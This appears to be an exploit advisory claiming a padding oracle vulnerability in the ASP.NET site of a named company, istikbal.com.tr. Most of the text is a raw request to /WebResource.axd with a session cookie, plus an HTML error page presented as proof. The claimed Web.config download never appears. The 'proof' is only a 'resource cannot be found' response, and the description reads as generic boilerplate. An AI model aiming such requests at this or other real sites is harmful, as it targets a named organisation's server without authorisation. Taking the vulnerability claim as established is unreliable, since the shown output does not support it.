Exploit Title:istikbal Padding Oracle Vulnerability 
# Date:10.12.2019
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: istikbal.com.tr
# Version: ALL 
# Tested on: Windows 10-Linux Kali


***************************************************************************************************
This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.NET application (it can be any application) to download a file from the remote Web Server. In this example the proof-of-concept exploit downloads the Web.config file.

GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=rsdw2kouuyhy2odwcpy1vi35
Host: www.istikbal.com.tr
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

poc 


<!DOCTYPE html>
<html>
    <head>
        <title>The resource cannot be found.</title>

           ****** <b> Requested URL: </b>/WebResource.axd<br><br>*********

            <hr width=100% size=1 color=silver>

            <b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3062.0

            </font>